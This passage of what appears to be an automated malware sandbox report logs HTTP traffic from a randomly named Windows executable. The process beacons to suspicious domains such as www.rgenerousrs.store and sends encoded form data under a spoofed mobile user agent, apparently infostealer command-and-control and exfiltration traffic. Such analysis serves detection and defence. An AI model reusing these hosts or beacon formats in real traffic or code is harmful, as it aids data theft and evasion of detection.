                                                          Data Ascii: T0_8iD=27GE0W46HILaWKFWfqVBrjKRhWC8isXZM9uD29vJ/hu0QVT8YnLXnCr0tLPbOjoPnWw4zXU897FzpHFZjkFlbKCEk74ZVjZtsie/UgutVpKbFKLUJea+yAYHjROxu5AcZqlJfKUSY4qv6+wQzOfZCbJBwCDfDUo1b2usC8mWv1JstpnZ1gEJFIUWYSYmJCqbn7tZSfos19pAgGJ5qh0yz7ba4lVH6VslTyR+U4pUq7+pGcyaFJwUatQFhRm6Ydtf/6Z5+SKqXKA1W6yyms0Ppo/qtReYRkkyfhEwxYEDm+NR3Fj2EHN9CE9wS0Y9o97q6imB8ulgui9W3wa64FtfJGAy7OicV4nvgzBKEHLnYOY5ccDdfTglSey9NhlRWoTdfqCuFQ7S/i84Qc8r+coxpo6GoLl/DCDjQxGA/11ehyU+tLDmGJDeZcfYodAtd2sAmq/2JPp2PDuv9oJUrJtIJ9o6GxodcZ8mL+W/sGfehvhZq0m19RT0M2ace58GA0k0J2rjOHr41oHqJn80E1ULPYasMTNy9C0MfoQaHwhcszP/TQDs9588kNZzvSdYzacPyeH36exgcRS2Pm1MMgCTBZ65LvKycqW/RSVno1myUR03Yix2r86iDV4nCTNMK+aqM/3D5FU/kfKXUxeXoAL6w69E7Mke1pTSCUvUQzQJJrvHMz7yVeYEKxpaZtAEcmcGRX1CNUvzsgT8IO/bZeDCCb9yKRFdKj0GlzQO4MF/sYPi5QBoW89E82b2KSkVszWgg7mqFO47Uswlm0kQDIfWznqSNMFaSyXyf6Oa01kBk/6CJeYRIhDHbxH++c4Mnw6QYzjNExTYqDHMiZcn6xvjhCjf0N8c17t40HxAXUMdx5eiH5uz3+fRQevlPc/RkaMGtuoWb7Bv9AyFa+m6qAmeVyrKYlTPB1UJ62pxJfNEZQGSVxSv36hLWODWmHVoz0THfIVAvQgOb6n/wGi2hrzwQ6Xtq3VLCnFbNpUETIRtoyzaO [TRUNCATED]
                                                          Nov 20, 2024 10:18:35.756067038 CET890INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:18:35 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K%2Fso3fQdYTuyGicfLrKEo8KghTsTZEF25vp6FcpzSJM7SMz9nayIdk%2FZPVQOl6W%2Fk%2BN%2FMS5SgB68qMgBJEpjFQryBcT6mKW%2F9oSwG4Ii8UnGf5yzRdWBmnmj9ap%2FuCKP"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8e575a804ea44267-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1560&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1790&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          20192.168.2.749990172.67.145.234801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:37.692461967 CET509OUTGET /vg0z/?T0_8iD=75uk3ictCfC5d95jc9ErhxuZnXjbt/7lQbKW3bXizAnaAV7ibEnK2RjZpZGGD2cxunkBvA8A/q4ys0sLjHkTFsHOpOkdYlpV7D2ZUl7tS97QQaenOfLP1h0Bt172p7BcfYdycOAFSb/c&DfkXi=Fj7DJJpHnHupXFB HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.vayui.top
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Nov 20, 2024 10:18:38.294605017 CET892INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:18:38 GMT
                                                          Content-Type: text/html
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yPkg4QhUsTK54qFxNb%2FDoDMVLTIAVV55C2P7Nb7U0bK5kZanLVZWSpm%2FOu28wNedfCthvNZKC8RyVPxWszJNrLALSnv9vim63FubpBb6tlqUcZEJTsACByuxFKR4RMVl"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8e575a90183b43bf-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1561&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=509&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          21192.168.2.749991188.114.97.3801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:43.513555050 CET781OUTPOST /o362/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Origin: http://www.rgenerousrs.store
                                                          Referer: http://www.rgenerousrs.store/o362/
                                                          Cache-Control: no-cache
                                                          Content-Length: 219
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 31 55 68 6a 62 68 72 57 67 39 41 34 58 57 34 61 44 41 62 58 74 63 71 51 5a 32 63 44 62 33 70 41 76 76 5a 68 32 2f 72 54 39 2b 57 61 53 58 4a 75 38 48 30 38 6e 46 68 30 5a 43 7a 68 32 4d 5a 71 34 34 67 2b 73 4d 48 76 41 33 6d 33 37 6a 2b 4f 41 77 52 69 47 68 6b 59 33 4f 72 46 66 7a 55 6d 72 55 4b 66 61 6c 44 63 36 44 4f 6c 56 55 65 67 39 63 46 42 6c 4f 6b 58 34 66 77 32 78 6f 36 41 56 43 61 4e 5a 52 6f 43 4d 43 5a 35 61 4a 58 71 6d 67 48 4e 6d 70 49 72 64 6a 2f 63 74 68 2f 54 78 65 6b 4f 34 65 56 71 6f 35 76 56 51 47 66 4c 44 56 46 77 2f 64 54 71 30 69 6c 6f 43 75 36 65 34 76 30 51 67 41 3d 3d
                                                          Data Ascii: T0_8iD=IYlouYrI0yQl1UhjbhrWg9A4XW4aDAbXtcqQZ2cDb3pAvvZh2/rT9+WaSXJu8H08nFh0ZCzh2MZq44g+sMHvA3m37j+OAwRiGhkY3OrFfzUmrUKfalDc6DOlVUeg9cFBlOkX4fw2xo6AVCaNZRoCMCZ5aJXqmgHNmpIrdj/cth/TxekO4eVqo5vVQGfLDVFw/dTq0iloCu6e4v0QgA==
                                                          Nov 20, 2024 10:18:44.381122112 CET1065INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:18:44 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qwI8VOtAP57YjoK5GKNJlsCaMkM7zD8uzNHQX%2BbQXxA0L3HGtYY6pwBDkfbRn6c2Fbp37CKmynYf0P1tgufXvrmFNnzvfaxEvY5qfB6rRZDGVCe84o5akYHZcxw89tCvlzTRPRTtpcY%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8e575ab509f243b5-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2052&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=781&delivery_rate=0&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          22192.168.2.749992188.114.97.3801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:46.185447931 CET801OUTPOST /o362/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Origin: http://www.rgenerousrs.store
                                                          Referer: http://www.rgenerousrs.store/o362/
                                                          Cache-Control: no-cache
                                                          Content-Length: 239
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 35 41 76 4c 4a 68 31 36 48 54 2b 2b 57 61 5a 33 4a 52 7a 6e 31 52 6e 46 73 4a 5a 48 54 68 32 4d 6c 71 34 34 77 2b 74 2f 76 73 44 48 6d 35 77 44 2b 4d 4f 51 52 69 47 68 6b 59 33 4f 50 38 66 33 34 6d 72 6b 61 66 62 41 76 62 33 6a 4f 69 57 55 65 67 71 4d 46 46 6c 4f 6b 6c 34 64 46 54 78 75 2b 41 56 47 4b 4e 59 41 6f 42 47 43 5a 7a 58 70 57 75 6c 54 44 48 75 49 59 6c 62 43 66 5a 75 7a 37 73 35 49 6c 73 69 38 5a 47 32 6f 58 75 55 45 37 39 55 7a 59 46 39 63 58 79 35 41 52 4a 64 5a 66 30 31 39 56 55 32 36 75 75 35 62 77 43 76 34 41 43 30 6e 57 38 37 71 6c 43 45 76 49 3d
                                                          Data Ascii: T0_8iD=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYB5AvLJh16HT++WaZ3JRzn1RnFsJZHTh2Mlq44w+t/vsDHm5wD+MOQRiGhkY3OP8f34mrkafbAvb3jOiWUegqMFFlOkl4dFTxu+AVGKNYAoBGCZzXpWulTDHuIYlbCfZuz7s5Ilsi8ZG2oXuUE79UzYF9cXy5ARJdZf019VU26uu5bwCv4AC0nW87qlCEvI=
                                                          Nov 20, 2024 10:18:46.884558916 CET1065INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:18:46 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hOvkByiyQkmUuzGiGTHzsncq0v1MFidoz4FQo1hGPVkQpkyZPyYYT6LGzqgMoRaLilRWGSi09ByN31QqnmahvnE0vUCc1nYcTtsNfAhoF%2FsyB6KHVpzMyCP1847kgwxaP8uoXRPJwyg%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8e575ac4bcbe8c3c-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=801&delivery_rate=0&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 66 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff e3 02 00 db 2a cd 17 19 01 00 00 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: f0LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8*0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          23192.168.2.749993188.114.97.3801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:48.841757059 CET1814OUTPOST /o362/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Origin: http://www.rgenerousrs.store
                                                          Referer: http://www.rgenerousrs.store/o362/
                                                          Cache-Control: no-cache
                                                          Content-Length: 1251
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Data Raw: 54 30 5f 38 69 44 3d 49 59 6c 6f 75 59 72 49 30 79 51 6c 7a 31 52 6a 5a 47 48 57 73 4e 41 35 64 32 34 61 4a 67 61 63 74 63 6d 51 5a 30 77 54 59 42 78 41 76 38 68 68 32 5a 66 54 2f 2b 57 61 48 48 4a 55 7a 6e 31 70 6e 46 30 4e 5a 48 58 78 32 4b 68 71 34 65 38 2b 71 4f 76 73 59 33 6d 35 2f 6a 2b 42 41 77 51 34 47 68 30 44 33 4f 66 38 66 33 34 6d 72 69 57 66 50 6c 44 62 6b 54 4f 6c 56 55 66 76 39 63 46 74 6c 4f 74 53 34 64 41 6d 32 65 65 41 4d 6d 61 4e 56 53 77 42 4b 43 5a 31 5a 4a 57 49 6c 55 4b 64 75 4d 34 2b 62 43 37 7a 75 7a 44 73 70 4f 49 61 6c 50 67 52 73 4b 54 4c 55 48 54 42 57 7a 73 6c 35 4f 6e 4f 32 77 78 4a 51 36 58 62 30 38 4a 56 39 4f 2f 70 35 64 46 30 69 34 30 55 77 33 33 51 67 71 46 46 57 4c 34 50 36 7a 66 48 4c 6a 66 66 70 45 6c 2b 41 65 53 38 52 44 67 6c 63 61 77 61 59 6d 7a 70 53 57 79 65 5a 35 6b 41 68 74 77 43 78 51 79 6a 4a 75 79 54 69 65 73 37 66 34 4f 70 62 50 33 56 72 43 77 73 79 6c 4d 71 62 66 36 48 49 70 43 51 52 48 71 37 77 59 2f 4a 2f 55 53 57 79 64 50 6a 4e 76 34 70 55 61 32 [TRUNCATED]
                                                          Data Ascii: T0_8iD=IYlouYrI0yQlz1RjZGHWsNA5d24aJgactcmQZ0wTYBxAv8hh2ZfT/+WaHHJUzn1pnF0NZHXx2Khq4e8+qOvsY3m5/j+BAwQ4Gh0D3Of8f34mriWfPlDbkTOlVUfv9cFtlOtS4dAm2eeAMmaNVSwBKCZ1ZJWIlUKduM4+bC7zuzDspOIalPgRsKTLUHTBWzsl5OnO2wxJQ6Xb08JV9O/p5dF0i40Uw33QgqFFWL4P6zfHLjffpEl+AeS8RDglcawaYmzpSWyeZ5kAhtwCxQyjJuyTies7f4OpbP3VrCwsylMqbf6HIpCQRHq7wY/J/USWydPjNv4pUa2jthQ9+xx4mXXL/bshwJeHaFw3A5TkOsGrXBx1nCH6pn4il7krw0YylXZi9FgDO6Uv3pCatX3Z/euGrirawhLn6eaPLyL1VCvgbDaO63WzhKrTGhcGaBuNuFeTayzZ1sy4dsUMOLqDFjirPW/LktnL+6yjp/1nc2uFm2EMJ3gickUH+bbPapFzS19YExgeC03n/P4o0yXnnNwuDOirj3mxHO4J/ThkxkC7VwHfL4GGLWw5xj+ViE0rXuE0cpKK2vFpsAM4LZZeqmds0YXb6eHmhSZB1EiP5qwmIIuZw/blqKD1JyWVxWBxxN4hfguA7AuFARPuXrHfMQx78hkbmn4PUez8az1JV/NJSw0u46D8Z+oTQpEsT3+mKhhyltRFenM0LN1NHmghePyVtv2RrInHWB1PXi5gLATxR8Pohf4AWfR8+LTqoGYGOQ3/1vIUzuOkh125h7aCXHFaAxYb+jH94jxT57fDAOb9z2hQ8OCQIdy9vQEcOTdD7cT/rUgJhPI599+5hA5CXmmvldffvPwoETRJh7wNyeX1HZasiPdS6pXgDfe5N8gg2+XaXTb0rr1d/YgDtt0lXYqsgJ5tCfTlaIxqMjO/DfLPmwSEXH16T88UfDfs7TpIk0cNbDo+nSt1PyD1FzpSsumOf9Brog3UkmDX7fgfkUXBI [TRUNCATED]
                                                          Nov 20, 2024 10:18:49.504051924 CET1076INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:18:49 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=23%2BiClD1vjgAxBxTbRY6v%2Bz2ijGHNT0KjNzbuwtjocWm%2F2C%2BLIq4BWJlMBaRCu1F8Ga3zsSYmN3drPd5lhxCjnbDuk1mf0zkUiYXPtoAMc%2BXSl0YitSxuvgPc7mi1rCe8NxR7oTt%2Bco%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8e575ad52ccfc33d-EWR
                                                          Content-Encoding: gzip
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1469&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1814&delivery_rate=0&cwnd=136&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 65 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 27 38 e0 4d ab 54 e2 b0 b2 44 9b 54 54 0a 25 02 e7 c0 d1 d4 0b 8e 54 e2 60 3b 04 fe 1e 25 15 52 af 33 6f 46 33 74 55 3c 6d f5 6b 5d c2 83 7e ac a0 6e 36 d5 7e 0b 8b 5b c4 7d a9 77 88 85 2e ce ce 4a 66 88 e5 61 a1 04 b9 f4 79 52 e4 d8 58 25 28 b5 e9 c4 2a cf 72 38 f8 04 3b 3f 74 96 f0 2c 0a c2 19 a2 37 6f 7f a7 dc 52 5d 30 6e a9 04 f5 4a 3b 86 c0 5f 03 c7 c4 16 9a e7 0a 46 13 a1 f3 09 de 27 0e 7c 07 c9 b5 11 22 87 6f 0e 92 b0 9f 9a 82 12 64 ac 0d 1c a3 ba ef cd d1 31 ae 64 2e d7 6b b8 6e ba f6 e7 06 5e 66 1c 4c 82 71 1c 65 f8 e0 8e 83 1f 62 88 32 26 1f 18 6a 1f 12 dc 65 84 ff 2d 82 70 9e 49 38 df fb 03 00 00 ff ff 0d 0a 62 0d 0a e3 02 00 db 2a cd 17 19 01 00 00 0d 0a
                                                          Data Ascii: e5LN0D'8MTDTT%T`;%R3oF3tU<mk]~n6~[}w.JfayRX%(*r8;?t,7oR]0nJ;_F'|"od1d.kn^fLqeb2&je-pI8b*
                                                          Nov 20, 2024 10:18:49.504662037 CET5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          24192.168.2.749994188.114.97.3801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:51.442275047 CET517OUTGET /o362/?T0_8iD=FaNItuPk5TcZ9HdRFxGis99OVV5mBzvNwqypTl8+VCtQ49ZNgIXGwO2PY0xc/TpBxHoMd3n/rLst/5dAk+rqAz7S5AqEHWwbJDh7++v3dj815B2sLXmj/Sv5TVvj9+8mlvYr2YMxw4/T&DfkXi=Fj7DJJpHnHupXFB HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Language: en-US
                                                          Host: www.rgenerousrs.store
                                                          Connection: close
                                                          User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 2.3.6; id; GT-S6102) U2/1.0.0 UCBrowser/9.9.0.543 U2/1.0.0 Mobile
                                                          Nov 20, 2024 10:18:52.190912962 CET1083INHTTP/1.1 404 Not Found
                                                          Date: Wed, 20 Nov 2024 09:18:52 GMT
                                                          Content-Type: text/html; charset=iso-8859-1
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          Vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Y3Dwbl5hGtdiDMrYOPnWQ2Ah8MZ96IDFlZrjodT64jyOfZ06TUx%2BOnDy58DxiQ76ScVgfLCd3q431v4JTZh64CSwIl971WEB3YqrUjyNFgapDDFXVr87w9HhdFUdqcoAjzrQMbopwHM%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8e575ae5eccf8c84-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1821&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=517&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 31 31 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 72 67 65 6e 65 72 6f 75 73 72 73 2e 73 74 6f 72 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 119<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.55 (Unix) Server at www.rgenerousrs.store Port 80</address></body></html>0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          25192.168.2.749995154.88.22.110801000C:\Program Files (x86)\YArPHgmngYrRjuSRqsYCzMXCHqfHRzCTOjFiwrFbOaAcIokELCwlPtkGyvQzBkfLm\KOXlLfnDPX.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 20, 2024 10:18:57.254673958 CET760OUTPOST /jhb8/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Host: www.t91rl7.pro
                                                          Origin: http://www.t91rl7.pro
                                                          Referer: http://www.t91rl7.pro/jhb8/
                                                          Cache-Control: no-cache
                                                          Content-Length: 219
                                                          Connection: close
